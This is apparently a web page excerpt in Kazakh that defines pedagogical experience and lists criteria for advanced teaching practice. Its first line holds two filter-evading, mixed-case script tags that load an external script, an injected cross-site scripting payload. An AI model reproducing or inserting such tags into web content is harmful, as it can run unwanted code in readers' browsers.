<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Педагогикалық тәжірибе – педагогика мен білім беру заңдарын, ұстанымдарын және заңдылықтарын білу, оларды нақты жағдайларды, балалардың, балалар ұжымының және білім беру маманының өз тұлғасының ерекшеліктерін ескере отырып жүзеге асыруға дайындығы және қабілеттілігі.
Озық педагогикалық тәжірибе (ОПТ) бұқаралық педагогикалық тәжірибеден туындайды, одан тәсілдерінің болжамдылығымен, ғылымилылығымен, шығармашылығымен басым түсіп, әдістемелік жүйенің және оның жекелеген құрамдастарының жетілдірілуіне септігін тигізеді.
ОПТ болып табылатын негізгі өлшем-талаптары:
– өзектілігі – қоғамдық дамудың заманауи үрдістеріне, педагогикалық ғылым мен іс-тәжірибенің озық идеяларына сәйкестігі;
– инновациялылығы – әдістемелік жүйенің және оның жекелеген құрамдастарының жетілдірілуіне септігін тигізетін педагогикалық қызметтің жаңашылдығы (жаңа енгізілім);
– қайта өндірушілігі – негізгі идеяны, әдістемені немесе оны білім берудің кәсіби мамандарымен жүзеге асыру технологиясын қайта өндіру мүмкіндігі;
- жоғары нәтижелілігі – оқушылардың сыртқы тексеру (аудит) растаған оқудағы жетістіктерінің елеулі, жүйелі, оң, тұрақты өсу қозғалысы.
Жалғасы ...